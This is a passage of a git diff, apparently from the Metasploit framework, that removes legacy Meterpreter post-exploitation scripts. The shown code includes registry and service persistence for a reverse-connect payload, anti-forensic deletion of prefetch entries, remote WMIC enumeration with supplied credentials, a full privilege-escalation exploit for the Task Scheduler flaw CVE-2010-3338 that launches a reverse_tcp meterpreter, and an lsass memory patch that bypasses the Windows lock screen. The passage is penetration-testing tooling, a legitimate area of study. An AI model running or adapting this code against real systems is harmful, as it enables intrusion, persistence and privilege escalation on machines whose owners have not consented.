- 'Payload' => mul.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
- print_good("exploit/multi/handler started!")
-end
-
-# Function to execute script on target and return the PID of the process
-#-------------------------------------------------------------------------------
-def targets_exec(script_on_target)
- print_status("Executing script #{script_on_target}")
- proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
- print_good("Agent executed with PID #{proc.pid}")
- return proc.pid
-end
-
-# Function to install payload in to the registry HKLM or HKCU
-#-------------------------------------------------------------------------------
-def write_to_reg(key,script_on_target)
- nam = Rex::Text.rand_text_alpha(rand(8)+8)
- key_path = "#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
- print_status("Installing into autorun as #{key_path}\\#{nam}")
- if key
- registry_setvaldata("#{key_path}", nam, script_on_target, "REG_SZ")
- print_good("Installed into autorun as #{key_path}\\#{nam}")
- file_local_write(@clean_up_rc, "reg deleteval -k '#{key_path}' -v #{nam}\n")
- else
- print_error("Error: failed to open the registry key for writing")
- end
-end
-
-# Function to install payload as a service
-#-------------------------------------------------------------------------------
-def install_as_service(script_on_target)
- if not is_uac_enabled? or is_admin?
- print_status("Installing as service..")
- nam = Rex::Text.rand_text_alpha(rand(8)+8)
- print_status("Creating service #{nam}")
- service_create(nam, nam, "cscript \"#{script_on_target}\"")
- file_local_write(@clean_up_rc, "execute -H -f sc -a \"delete #{nam}\"\n")
- else
- print_error("Insufficient privileges to create service")
- end
-end
-
-
-################## Main ##################
-@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- when "-i"
- delay = val.to_i
- when "-X"
- install = true
- key = "HKLM"
- when "-S"
- serv = true
- when "-U"
- install = true
- key = "HKCU"
- when "-A"
- autoconn = true
- when "-L"
- target_dir = val
- when "-T"
- altexe = val
- when "-P"
- payload_type = val
- end
-}
-
-# Check for Version of Meterpreter
-unless client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
- wrong_meter_version(client.session_type)
-end
-
-print_status("Running Persistence Script")
-# Create undo script
-@clean_up_rc = log_file()
-print_status("Resource file for cleanup created at #{@clean_up_rc}")
-# Create and Upload Payload
-raw = create_payload(payload_type, rhost, rport)
-script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
-script_on_target = write_script_to_target(target_dir, script)
-
-# Start exploit/multi/handler
-if autoconn
- set_handler(payload_type, rhost, rport)
-end
-
-# Execute on target host
-targets_exec(script_on_target)
-
-# Install in registry
-if install
- write_to_reg(key,script_on_target)
-end
-
-# Install as a service
-if serv
- install_as_service(script_on_target)
-end
-
diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb
deleted file mode 100644
index 97e346b5ff..0000000000
--- a/scripts/meterpreter/prefetchtool.rb
+++ /dev/null
@@ -1,195 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#Meterpreter script for extracting information from windows prefetch folder
-#Provided by Milo at keith.lee2012[at]gmail.com
-#Verion: 0.1.0
-
-require 'fileutils'
-require 'net/http'
-require 'digest/sha1'
-
-@session = client
-@host,@port = @session.session_host, session.session_port
-
-# Script Options
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-p" => [ false, "List Installed Programs"],
- "-c" => [ false, "Disable SHA1/MD5 checksum"],
- "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
- "-i" => [ false, "Perform lookup for software name"],
- "-l" => [ false, "Download Prefetch Folder Analysis Log"]
-)
-
-@tempdir = @session.sys.config.getenv('TEMP')
-
-#---------------------------------------------------------------------------------------------------------
-def read_program_list
- key = @session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
- sfmsvals = key.enum_key
- sfmsvals.each do |test1|
- begin
- key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
- root_key2, base_key2 = @session.sys.registry.splitkey(key2)
- value1 = "DisplayName"
- value2 = "DisplayVersion"
- open_key = @session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
- v1 = open_key.query_value(value1)
- v2 = open_key.query_value(value2)
- print_status("#{v1.data}\t(Version: #{v2.data})")
- rescue
- end
- end
-end
-
-def prefetch_dump(options, logging=false)
-
- lexe = File.join(Msf::Config.data_directory, "prefetch.exe")
- rexe = sprintf("%.5d",rand(100000)) + ".exe"
- rlog = sprintf("%.5d",rand(100000)) + ".txt"
-
- print_status("Uploading Prefetch-tool for analyzing Prefetch folder...")
- begin
- @session.fs.file.upload_file("#{@tempdir}\\#{rexe}", lexe)
- print_status("Prefetch-tool uploaded as #{@tempdir}\\#{rexe}")
- rescue ::Interrupt; raise $!
- rescue ::Exception => e
- print_status("The following error was encountered: #{e.class} #{e}")
- return
- end
-
- begin
-
- if(logging)
- options += " --txt=#{@tempdir}\\#{rlog}"
- end
-
- r = @session.sys.process.execute("cmd.exe /c #{@tempdir}\\#{rexe} #{options} #{rlog}", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = r.channel.read)
- d.split("\n").each do |out|
- print_status("OUT> #{out.strip}")
- end
- end
-
- found = true
- while (not found)
- found = false
- @session.sys.process.get_processes().each do |x|
- found = false
- if (x['name'].downcase == rexe)
- found = true
- end
- end
- sleep(0.5) if found
- end
-
- r.channel.close
- r.close
-
- print_status("Deleting #{rexe} from target...")
- @session.sys.process.execute("cmd.exe /c del #{@tempdir}\\#{rexe}", nil, {'Hidden' => 'true'})
-
- print_status("Clearing prefetch-tool prefetch entry ...")
- @session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{rexe.gsub('.exe','')}*.pf", nil, {'Hidden' => 'true'})
-
- if(logging)
- logfile = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', @host + "-" + ::Time.now.strftime("%Y%m%d.%M%S") + ".log")
- print_status("[*] Saving prefetch logs to #{logfile}...")
- @session.fs.file.download_file(logfile, "#{@tempdir}\\#{rlog}")
- print_status("[*] Deleting log file from target...")
- @session.sys.process.execute("cmd.exe /c del #{@tempdir}\\#{rlog}", nil, {'Hidden' => 'true'})
- end
-
- rescue ::Interrupt; raise $!
- rescue ::Exception => e
- print_status("The following error was encountered: #{e.class} #{e}")
- return
- end
-end
-
-
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-
-
-################## MAIN ##################
-
-options = ""
-logging = false
-view_list = false
-check_update = false
-
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-x"
- options += " --x=" + val
- when "-c"
- options += " --disable-md5 --disable-sha1"
- when "-p"
- view_list = true
- when "-i"
- options += " --inet-lookup"
- when "-l"
- logging = true
- when "-h"
- print_status( "Prefetch-tool Meterpreter Script")
- print_line(@@exec_opts.usage)
- raise Rex::Script::Completed
- end
-}
-unsupported if client.platform !~ /win32|win64/i
-prefetch_local = ::File.join(Msf::Config.data_directory, "prefetch.exe")
-
-if !(::File.exist?(prefetch_local))
- print_status("No local copy of prefetch.exe, downloading from the internet...")
- Net::HTTP.start("prefetch-tool.googlecode.com") do |http|
- req = Net::HTTP::Get.new("/files/prefetch.exe")
- resp = http.request(req)
- ::File.open(::File.join(Msf::Config.data_directory, "prefetch.exe"), "wb") do |fd|
- fd.write(resp.body)
- end
- end
- print_status("Downloaded prefetch.exe to #{prefetch_local}")
-else
- print_status("Checking for an updated copy of prefetch.exe..")
- digest = Digest::SHA1.hexdigest(::File.read(prefetch_local, ::File.size(prefetch_local)))
-
- Net::HTTP.start("code.google.com") do |http|
- req = Net::HTTP::Get.new("/p/prefetch-tool/downloads/detail?name=prefetch.exe&can=2&q=")
- resp = http.request(req)
- body = resp.body
- chksum = body.scan(/SHA1 Checksum: <\/th>.* | /,'')
- chksum.sub!(/ [ false, "Help menu."],
- "-t" => [ true, "The target address"],
- "-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
- "-p" => [ true, "Password of user on target system"]
-)
-
-# Create Filename info to be appended to downloaded files
-filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
-# Create a directory for the logs
-logs = ::File.join(Msf::Config.log_directory, 'scripts', 'remotewinenum')
-
-# Create the log directory
-::FileUtils.mkdir_p(logs)
-
-# WMIC Commands that will be executed on the Target
-wmic = [
- 'environment list',
- 'share list',
- 'nicconfig list',
- 'computersystem list',
- 'useraccount list',
- 'group list',
- 'sysaccount list',
- 'volume list brief',
- 'logicaldisk get description,filesystem,name,size',
- 'netlogin get name,lastlogon,badpasswordcount',
- 'netclient list brief',
- 'netuse get name,username,connectiontype,localname',
- 'share get name,path',
- 'nteventlog get path,filename,writeable',
- 'service list brief',
- 'process list brief',
- 'startup list full',
- 'rdtoggle list',
- 'product get name,version',
- 'qfe list'
-]
-################## Function Declarations ##################
-
-# Function for running a list of WMIC commands stored in a array, returs string
-def wmicexec(session,wmic,user,pass,trgt)
- print_status("Running WMIC Commands ....")
- tmpout = ''
- command = nil
- runfail = 0
- runningas = session.sys.config.getuid
- begin
- tmp = session.sys.config.getenv('TEMP')
- # Temporary file on windows host to store results
- wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
-
- wmic.each do |wmi|
- if user == nil
- print_status("The commands will be ran under the credentials of #{runningas}")
- command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
- else
- command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
- end
- print_status "\trunning command wimic #{wmi}"
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- #print_status "\twmic #{command}"
- r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
- #Making sure that wmic finishes before executing next wmic command
- prog2check = "wmic.exe"
- found = 0
- sleep(2)
- while found == 0
- session.sys.process.get_processes().each do |x|
- found =1
- if prog2check == (x['name'].downcase)
- sleep(0.5)
- found = 0
- end
- end
- end
- r.close
- end
- # Read the output file of the wmic commands
- wmioutfile = session.fs.file.new(wmicfl, "rb")
- until wmioutfile.eof?
- tmpout << wmioutfile.read
- end
- # Close output file in host
- wmioutfile.close
- rescue ::Exception => e
- print_status("Error running WMIC commands: #{e.class} #{e}")
- end
- # We delete the file with the wmic command output.
- c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
- c.close
- tmpout
-end
-
-#------------------------------------------------------------------------------
-# Function to generate report header
-def headerbuid(session,target,dest)
- # Header for File that will hold all the output of the commands
- info = session.sys.config.sysinfo
- header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
- header << "Running as: #{client.sys.config.getuid}\n"
- header << "From: #{info['Computer']}\n"
- header << "OS: #{info['OS']}\n"
- header << "Target: #{target}\n"
- header << "\n\n\n"
-
- print_status("Saving report to #{dest}")
- header
-
-end
-
-#------------------------------------------------------------------------------
-# Function Help Message
-def helpmsg
- print("Remote Windows Enumeration Meterpreter Script\n" +
- "This script will enumerate windows hosts in the target enviroment\n" +
- "given a username and password or using the credential under witch\n" +
- "Meterpeter is running using WMI wmic windows native tool.\n" +
- "Usage:\n" +
- @@exec_opts.usage)
-end
-################## MAIN ##################
-if client.platform =~ /win32|win64/
- localos = session.sys.config.sysinfo
-
- # Check that the command is not being ran on a Win2k host
- # since wmic is not present in Windows 2000
- if localos =~ /(Windows 2000)/
- print_status("This script is not supported to be ran from Windows 2000 servers!!!")
- else
- # Parsing of Options
- @@exec_opts.parse(args) { |opt, idx, val|
- case opt
-
- when "-t"
- trg = val
- when "-u"
- rusr = val
- when "-p"
- rpass = val
- when "-h"
- helpmsg
- helpcall = 1
- end
-
- }
- #logfile name
- dest = logs + "/" + trg + filenameinfo
- # Executing main logic of the script
- if helpcall == 0 and trg != ""
-
- # Making sure that is running as System a Username and Password for target machine must be provided
-
- if is_system? && rusr == nil && rpass == nil
-
- print_status("Stopped: Running as System and no user provided for connecting to target!!")
-
- else trg != nil && helpcall != 1
-
- file_local_write(dest,headerbuid(session,trg,dest))
- file_local_write(dest,wmicexec(session,wmic,rusr,rpass,trg))
-
- end
- elsif helpcall == 0 and trg == ""
-
- helpmsg
- end
- end
-else
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb
deleted file mode 100644
index 1f1f9627b0..0000000000
--- a/scripts/meterpreter/schelevator.rb
+++ /dev/null
@@ -1,394 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-##
-#
-# This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet
-#
-# Disclosed around Oct 22, 2010
-#
-# written by jduck
-#
-# NOTE: Thanks to webDEViL for the information about disable/enable.
-# http://www.exploit-db.com/exploits/15589/
-#
-# CVE 2010-3338
-# MSB MS10-092
-#
-##
-
-require 'zlib'
-
-#
-# Filter out sessions that this definitely won't work on.
-#
-unless [ARCH_X64, ARCH_X86, ARCH_JAVA].include(session.arch)
- print_error("#{session.arch} is not supported.")
- raise Rex::Script::Completed
-end
-
-unless session.platform == 'windows'
- print_error("#{session.platform} is not supported.")
- raise Rex::Script::Completed
-end
-
-if session.sys.config.sysinfo["Architecture"] == ARCH_X64 && session.arch == ARCH_X86
- #
- # WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
- # worse, meterpreter/railgun creates things in a new thread, making it much more
- # difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
- # offer a workaround and error out.
- #
- print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...")
- raise Rex::Script::Completed
-end
-
-vuln = false
-winver = session.sys.config.sysinfo["OS"]
-affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
-affected.each { |v|
- if winver.include? v
- vuln = true
- break
- end
-}
-if not vuln
- print_error("#{winver} is not vulnerable.")
- raise Rex::Script::Completed
-end
-
-
-#
-# We have a chance to succeed, check params
-#
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-c" => [ true, "Execute the specified command" ],
- "-u" => [ true, "Upload and execute the specified file" ],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"],
- "-t" => [ true, "Use the specified task name" ]
-)
-
-def usage
- print_line("Schelevator -- Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation")
- print(@@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-rhost = Rex::Socket.source_address
-rport = 4444
-taskname = nil
-cmd = nil
-upload_fn = nil
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
-
- when "-c"
- cmd = val
-
- when "-u"
- upload_fn = val
- if not ::File.exist?(upload_fn)
- raise "Specified file to upload does not exist!"
- end
-
- when "-t"
- taskname = val
-
- when "-h"
- usage
-
- when "-r"
- rhost = val
-
- when "-p"
- rport = val.to_i
- end
-}
-
-envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
-sysdir = envs['SystemRoot']
-tmpdir = envs['TEMP']
-
-# Must have at least one of -c or -u
-if not cmd and not upload_fn
- print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
-
- # Get the exe payload.
- pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
- pay.datastore['LHOST'] = rhost
- pay.datastore['LPORT'] = rport
- raw = pay.generate
- exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
- #and placing it on the target in %TEMP%
- tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
- cmd = tmpdir + "\\" + tempexename + ".exe"
- print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
- fd = client.fs.file.new(cmd, "wb")
- fd.write(exe)
- fd.close
-
- #get handler to be ready
- handler = client.framework.exploits.create("multi/handler")
- handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
- handler.datastore['LHOST'] = rhost
- handler.datastore['LPORT'] = rport
- handler.datastore['InitialAutoRunScript'] = "migrate -f"
- handler.datastore['ExitOnSession'] = false
- #start a handler to be ready
- handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
-end
-
-if cmd
- print_status("Using command: #{cmd}")
-end
-
-#
-# Upload the payload command if needed
-#
-if upload_fn
- begin
- location = tmpdir.dup
- ext = upload_fn.split('.')
- if ext
- ext = ext.last.downcase
- if ext == "exe"
- location << "\\svhost#{rand(100)}.exe"
- else
- location << "\\TMP#{rand(100)}.#{ext}"
- end
- else
- location << "\\TMP#{rand(100)}"
- end
-
- print_status("Uploading #{upload_fn} to #{location}....")
- session.fs.file.upload_file(location, upload_fn)
- print_status("Upload complete.")
- rescue ::Exception => e
- print_error("Error uploading file #{upload_fn}: #{e.class} #{e}")
- raise e
- end
-
- cmd ||= location
-end
-
-def crc32(data)
- table = Zlib.crc_table
- crc = 0xffffffff
- data.unpack('C*').each { |b|
- crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
- }
- crc
-end
-
-def fix_crc32(data, old_crc)
- #
- # CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
- # reversed from Microsoft's code)
- #
- bwd_table = [
- 0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
- 0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
- 0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
- 0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
- 0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
- 0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
- 0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
- 0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
- 0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
- 0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
- 0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
- 0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
- 0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
- 0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
- 0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
- 0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
- 0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
- 0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
- 0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
- 0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
- 0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
- 0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
- 0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
- 0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
- 0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
- 0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
- 0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
- 0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
- 0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
- 0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
- 0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
- 0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
- 0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
- 0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
- 0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
- 0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
- 0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
- 0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
- 0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
- 0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
- 0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
- 0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
- 0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
- 0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
- 0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
- 0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
- 0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
- 0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
- 0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
- 0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
- 0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
- 0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
- 0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
- 0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
- 0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
- 0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
- 0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
- 0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
- 0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
- 0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
- 0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
- 0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
- 0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
- 0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
- ]
-
- crc = crc32(data[0, data.length - 12])
- data[-12, 4] = [crc].pack('V')
-
- data[-12, 12].unpack('C*').reverse.each { |b|
- old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
- }
- data[-12, 4] = [old_crc].pack('V')
-end
-
-def exec_schtasks(cmdline, purpose)
- lns = cmd_exec("cmd.exe /c " + cmdline + " && echo SCHELEVATOR")
- success = false
- lns.each_line { |ln|
- ln.chomp!
- if ln =~ /^SCHELEVATOR$/
- success = true
- else
- print_status(ln)
- end
- }
- raise "Unable to #{purpose}!" if not success
-end
-
-
-def read_task_file(taskname, taskfile)
- print_status("Reading the task file contents from #{taskfile}...")
-
- # Can't read the file directly on 2008?
- content = ''
- fd = client.fs.file.new(taskfile, "rb")
- until fd.eof?
- content << fd.read
- end
- fd.close
-
- content
-end
-
-
-#
-# Create a new task to do our bidding, but make sure it doesn't run.
-#
-taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
-taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
-
-print_status("Creating task: #{taskname}")
-cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
-exec_schtasks(cmdline, "create the task")
-
-#
-# Read the contents of the newly creates task file
-#
-content = read_task_file(taskname, taskfile)
-
-#
-# Double-check that we got what we expect.
-#
-if content[0,2] != "\xff\xfe"
- #
- # Convert to unicode, since it isn't already
- #
- content = content.unpack('C*').pack('v*')
-else
- #
- # NOTE: we strip the BOM here to exclude it from the crc32 calculation
- #
- content = content[2,content.length]
-end
-
-
-#
-# Record the crc32 for later calculations
-#
-old_crc32 = crc32(content)
-print_status("Original CRC32: 0x%x" % old_crc32)
-
-#
-# Convert the file contents from unicode
-#
-content = content.unpack('v*').pack('C*')
-
-#
-# Mangle the contents to now run with SYSTEM privileges
-#
-content.gsub!('LeastPrivilege', 'HighestAvailable')
-content.gsub!(/.*<\/UserId>/, 'S-1-5-18')
-content.gsub!(/.*<\/Author>/, 'S-1-5-18')
-#content.gsub!('InteractiveToken', 'Password')
-content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
-content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
-content << ""
-
-#
-# Convert it back to unicode
-#
-content = Rex::Text.to_unicode(content)
-
-#
-# Fix it so the CRC matches again
-#
-fix_crc32(content, old_crc32)
-new_crc32 = crc32(content)
-print_status("Final CRC32: 0x%x" % new_crc32)
-
-#
-# Write the new content back
-#
-print_status("Writing our modified content back...")
-fd = client.fs.file.new(taskfile, "wb")
-fd.write "\xff\xfe" + content
-fd.close
-
-#
-# Run the task :-)
-#
-print_status("Disabling the task...")
-exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task")
-
-print_status("Enabling the task...")
-exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task")
-
-print_status("Executing the task...")
-exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")
-
-
-#
-# And delete it.
-#
-print_status("Deleting the task...")
-exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task")
diff --git a/scripts/meterpreter/screen_unlock.rb b/scripts/meterpreter/screen_unlock.rb
deleted file mode 100644
index 14dd1036e3..0000000000
--- a/scripts/meterpreter/screen_unlock.rb
+++ /dev/null
@@ -1,84 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#
-# Script to unlock a windows screen by L4teral
-# Needs system prvileges to run and known signatures for the target system.
-# This script patches msv1_0.dll loaded by lsass.exe
-#
-# Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
-#
-
-revert = false
-targets = [
- { :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os => /Windows XP.*Service Pack 2/ },
- { :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os => /Windows XP.*Service Pack 3/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
-]
-
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-r" => [ false, "revert the patch (enable screen locking again)"]
-)
-opts.parse(args) { |opt, idx, val|
- case opt
- when "-r"
- revert = true
- when "-h"
- print_line("")
- print_line("USAGE: run screen_unlock [-r]")
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
-}
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-unsupported if client.platform !~ /win32|win64/i
-os = client.sys.config.sysinfo['OS']
-
-targets.each do |t|
- if os =~ t[:os]
- target = t
- print_status("OS '#{os}' found in known targets")
- pid = client.sys.process["lsass.exe"]
- p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
- dllbase = p.image["msv1_0.dll"]
-
- sig = p.memory.read(dllbase + target[:sigoffset], target[:sig].length / 2).unpack("H*")[0]
- if sig != target[:sig]
- print_error("found signature does not match")
- next
- end
- old_code = p.memory.read(dllbase + target[:patchoffset], target[:orig_code].length / 2).unpack("H*")[0]
- if !((old_code == target[:orig_code] && !revert) || (old_code == target[:patch] && revert))
- print_error("found code does not match")
- next
- end
-
- print_status("patching...")
- new_code = revert ? target[:orig_code] : target[:patch]
- p.memory.write(dllbase + target[:patchoffset], [new_code].pack("H*"))
-
- written_code = p.memory.read(dllbase + target[:patchoffset], target[:patch].length / 2).unpack("H*")[0]
- if ((written_code == target[:patch] && !revert) || (written_code == target[:orig_code] && revert))
- print_status("done!")
- raise Rex::Script::Completed
- else
- print_error("failed!")
- next
- end
- end
-end
-
-print_status("no working target found")
-
diff --git a/scripts/meterpreter/screenspy.rb b/scripts/meterpreter/screenspy.rb
deleted file mode 100644
index 77c1f86b84..0000000000
--- a/scripts/meterpreter/screenspy.rb
+++ /dev/null
@@ -1,158 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
